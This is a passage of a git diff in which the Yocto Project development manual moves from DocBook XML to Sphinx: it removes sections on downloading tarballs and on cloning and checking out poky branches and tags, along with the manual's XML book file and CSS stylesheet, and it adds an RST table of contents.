-                    which is the released Poky tarball).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Download the Tarball:</emphasis>
-                    Click the tarball to download and save a snapshot of the
-                    given component.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='using-the-downloads-page'>
-        <title>Using the Downloads Page</title>
-
-        <para>
-            The
-            <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
-            uses a "DOWNLOADS" page from which you can locate and download
-            tarballs of any Yocto Project release.
-            Rather than Git repositories, these files represent snapshot
-            tarballs similar to the tarballs located in the Index of Releases
-            described in the
-            "<link linkend='accessing-index-of-releases'>Accessing Index of Releases</link>"
-            section.
-            <note><title>Tip</title>
-                The recommended method for accessing Yocto Project
-                components is to use Git to clone a repository and work from
-                within that local repository.
-                The procedure in this section exists should you desire a
-                tarball snapshot of any given component.
-            </note>
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Go to the Yocto Project Website:</emphasis>
-                    Open The
-                    <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>
-                    in your browser.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Get to the Downloads Area:</emphasis>
-                    Select the "DOWNLOADS" item from the pull-down
-                    "SOFTWARE" tab menu near the top of the page.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Select a Yocto Project Release:</emphasis>
-                    Use the menu next to "RELEASE" to display and choose
-                    a recent or past supported Yocto Project release
-                    (e.g. &DISTRO_NAME_NO_CAP;,
-                    &DISTRO_NAME_NO_CAP_MINUS_ONE;, and so forth).
-                    <note><title>Tip</title>
-                        For a "map" of Yocto Project releases to version
-                        numbers, see the
-                        <ulink url='https://wiki.yoctoproject.org/wiki/Releases'>Releases</ulink>
-                        wiki page.
-                    </note>
-                    You can use the "RELEASE ARCHIVE" link to reveal a menu of
-                    all Yocto Project releases.
-                </para></listitem>
-                <listitem><para>
-                    <emphasis>Download Tools or Board Support Packages (BSPs):</emphasis>
-                    From the "DOWNLOADS" page, you can download tools or
-                    BSPs as well.
-                    Just scroll down the page and look for what you need.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='accessing-nightly-builds'>
-        <title>Accessing Nightly Builds</title>
-
-        <para>
-            Yocto Project maintains an area for nightly builds that contains
-            tarball releases at <ulink url='&YOCTO_AB_NIGHTLY_URL;'/>.
-            These builds include Yocto Project releases ("poky"),
-            toolchains, and builds for supported machines.
-        </para>
-
-        <para>
-            Should you ever want to access a nightly build of a particular
-            Yocto Project component, use the following procedure:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Locate the Index of Nightly Builds:</emphasis>
-                    Open a browser and go to
-                    <ulink url='&YOCTO_AB_NIGHTLY_URL;'/> to access the
-                    Nightly Builds.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Select a Date:</emphasis>
-                    Click on the date in which you are interested.
-                    If you want the latest builds, use "CURRENT".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Select a Build:</emphasis>
-                    Choose the area in which you are interested.
-                    For example, if you are looking for the most recent
-                    toolchains, select the "toolchain" link.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Find the Tarball:</emphasis>
-                    Drill down to find the associated tarball.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Download the Tarball:</emphasis>
-                    Click the tarball to download and save a snapshot of the
-                    given component.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-</section>
-
-<section id='cloning-and-checking-out-branches'>
-    <title>Cloning and Checking Out Branches</title>
-
-    <para>
-        To use the Yocto Project for development, you need a release locally
-        installed on your development system.
-        This locally installed set of files is referred to as the
-        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-        in the Yocto Project documentation.
-    </para>
-
-    <para>
-        The preferred method of creating your Source Directory is by using
-        <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> to clone a local
-        copy of the upstream <filename>poky</filename> repository.
-        Working from a cloned copy of the upstream repository allows you
-        to contribute back into the Yocto Project or to simply work with
-        the latest software on a development branch.
-        Because Git maintains and creates an upstream repository with
-        a complete history of changes and you are working with a local
-        clone of that repository, you have access to all the Yocto
-        Project development branches and tag names used in the upstream
-        repository.
-    </para>
-
-    <section id='cloning-the-poky-repository'>
-        <title>Cloning the <filename>poky</filename> Repository</title>
-
-        <para>
-            Follow these steps to create a local version of the
-            upstream
-            <ulink url='&YOCTO_DOCS_REF_URL;#poky'><filename>poky</filename></ulink>
-            Git repository.
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Set Your Directory:</emphasis>
-                    Change your working directory to where you want to
-                    create your local copy of
-                    <filename>poky</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Clone the Repository:</emphasis>
-                    The following example command clones the
-                    <filename>poky</filename> repository and uses
-                    the default name "poky" for your local repository:
-                    <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/poky
-     Cloning into 'poky'...
-     remote: Counting objects: 432160, done.
-     remote: Compressing objects: 100% (102056/102056), done.
-     remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
-     Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
-     Resolving deltas: 100% (323116/323116), done.
-     Checking connectivity... done.
-                    </literallayout>
-                    Unless you specify a specific development branch or
-                    tag name, Git clones the "master" branch, which results
-                    in a snapshot of the latest development changes for
-                    "master".
-                    For information on how to check out a specific
-                    development branch or on how to check out a local
-                    branch based on a tag name, see the
-                    "<link linkend='checking-out-by-branch-in-poky'>Checking Out By Branch in Poky</link>"
-                    and
-                    <link linkend='checkout-out-by-tag-in-poky'>Checking Out By Tag in Poky</link>"
-                    sections, respectively.</para>
-
-                    <para>Once the local repository is created, you can
-                    change to that directory and check its status.
-                    Here, the single "master" branch exists on your system
-                    and by default, it is checked out:
-                    <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ git status
-     On branch master
-     Your branch is up-to-date with 'origin/master'.
-     nothing to commit, working directory clean
-     $ git branch
-     * master
-                    </literallayout>
-                    Your local repository of poky is identical to the
-                    upstream poky repository at the time from which it was
-                    cloned.
-                    As you work with the local branch, you can periodically
-                    use the <filename>git pull &dash;&dash;rebase</filename>
-                    command to be sure you are up-to-date with the upstream
-                    branch.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='checking-out-by-branch-in-poky'>
-        <title>Checking Out by Branch in Poky</title>
-
-        <para>
-            When you clone the upstream poky repository, you have access to
-            all its development branches.
-            Each development branch in a repository is unique as it forks
-            off the "master" branch.
-            To see and use the files of a particular development branch
-            locally, you need to know the branch name and then specifically
-            check out that development branch.
-            <note>
-                Checking out an active development branch by branch name
-                gives you a snapshot of that particular branch at the time
-                you check it out.
-                Further development on top of the branch that occurs after
-                check it out can occur.
-            </note>
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Switch to the Poky Directory:</emphasis>
-                    If you have a local poky Git repository, switch to that
-                    directory.
-                    If you do not have the local copy of poky, see the
-                    "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
-                    section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Determine Existing Branch Names:</emphasis>
-                    <literallayout class='monospaced'>
-     $ git branch -a
-     * master
-       remotes/origin/1.1_M1
-       remotes/origin/1.1_M2
-       remotes/origin/1.1_M3
-       remotes/origin/1.1_M4
-       remotes/origin/1.2_M1
-       remotes/origin/1.2_M2
-       remotes/origin/1.2_M3
-           .
-           .
-           .
-       remotes/origin/thud
-       remotes/origin/thud-next
-       remotes/origin/warrior
-       remotes/origin/warrior-next
-       remotes/origin/zeus
-       remotes/origin/zeus-next
-       ... and so on ...
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Check out the Branch:</emphasis>
-                    Check out the development branch in which you want to work.
-                    For example, to access the files for the Yocto Project
-                    &DISTRO; Release (&DISTRO_NAME;), use the following command:
-                    <literallayout class='monospaced'>
-     $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
-     Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
-     Switched to a new branch '&DISTRO_NAME_NO_CAP;'
-                    </literallayout>
-                    The previous command checks out the "&DISTRO_NAME_NO_CAP;"
-                    development branch and reports that the branch is tracking
-                    the upstream "origin/&DISTRO_NAME_NO_CAP;" branch.</para>
-
-                    <para>The following command displays the branches
-                    that are now part of your local poky repository.
-                    The asterisk character indicates the branch that is
-                    currently checked out for work:
-                    <literallayout class='monospaced'>
-     $ git branch
-       master
-     * &DISTRO_NAME_NO_CAP;
-                    </literallayout>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='checkout-out-by-tag-in-poky'>
-        <title>Checking Out by Tag in Poky</title>
-
-        <para>
-            Similar to branches, the upstream repository uses tags
-            to mark specific commits associated with significant points in
-            a development branch (i.e. a release point or stage of a
-            release).
-            You might want to set up a local branch based on one of those
-            points in the repository.
-            The process is similar to checking out by branch name except you
-            use tag names.
-            <note>
-                Checking out a branch based on a tag gives you a
-                stable set of files not affected by development on the
-                branch above the tag.
-            </note>
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Switch to the Poky Directory:</emphasis>
-                    If you have a local poky Git repository, switch to that
-                    directory.
-                    If you do not have the local copy of poky, see the
-                    "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
-                    section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Fetch the Tag Names:</emphasis>
-                    To checkout the branch based on a tag name, you need to
-                    fetch the upstream tags into your local repository:
-                    <literallayout class='monospaced'>
-     $ git fetch --tags
-     $
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>List the Tag Names:</emphasis>
-                    You can list the tag names now:
-                    <literallayout class='monospaced'>
-     $ git tag
-     1.1_M1.final
-     1.1_M1.rc1
-     1.1_M1.rc2
-     1.1_M2.final
-     1.1_M2.rc1
-        .
-        .
-        .
-     yocto-2.5
-     yocto-2.5.1
-     yocto-2.5.2
-     yocto-2.5.3
-     yocto-2.6
-     yocto-2.6.1
-     yocto-2.6.2
-     yocto-2.7
-     yocto_1.5_M5.rc8
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Check out the Branch:</emphasis>
-                    <literallayout class='monospaced'>
-     $ git checkout tags/&DISTRO_REL_TAG; -b my_yocto_&DISTRO;
-     Switched to a new branch 'my_yocto_&DISTRO;'
-     $ git branch
-       master
-     * my_yocto_&DISTRO;
-                    </literallayout>
-                    The previous command creates and checks out a local
-                    branch named "my_yocto_&DISTRO;", which is based on
-                    the commit in the upstream poky repository that has
-                    the same tag.
-                    In this example, the files you have available locally
-                    as a result of the <filename>checkout</filename>
-                    command are a snapshot of the
-                    "&DISTRO_NAME_NO_CAP;" development branch at the point
-                    where Yocto Project &DISTRO; was released.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual.rst b/documentation/dev-manual/dev-manual.rst
new file mode 100644
index 0000000000..8f09224fe8
--- /dev/null
+++ b/documentation/dev-manual/dev-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+======================================
+Yocto Project Development Tasks Manual
+======================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   dev-manual-intro
+   dev-manual-start
+   dev-manual-common-tasks
+   dev-manual-qemu
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/dev-manual/dev-manual.xml b/documentation/dev-manual/dev-manual.xml
deleted file mode 100755
index 26d37da354..0000000000
--- a/documentation/dev-manual/dev-manual.xml
+++ /dev/null
@@ -1,214 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='dev-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/dev-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Development Tasks Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.1</revnumber>
-                <date>October 2011</date>
-                <revremark>The initial document released with the Yocto Project 1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.2</revnumber>
-                <date>April 2012</date>
-                <revremark>Released with the Yocto Project 1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.3</revnumber>
-                <date>October 2012</date>
-                <revremark>Released with the Yocto Project 1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>Released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-     <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-          Permission is granted to copy, distribute and/or modify this document under
-          the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
-          Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
-          Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Development Tasks Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="dev-manual-intro.xml"/>
-
-    <xi:include href="dev-manual-start.xml"/>
-
-    <xi:include href="dev-manual-common-tasks.xml"/>
-
-    <xi:include href="dev-manual-qemu.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-style.css b/documentation/dev-manual/dev-style.css
deleted file mode 100644
index 6d0aa8e9fa..0000000000
--- a/documentation/dev-manual/dev-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/dev-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
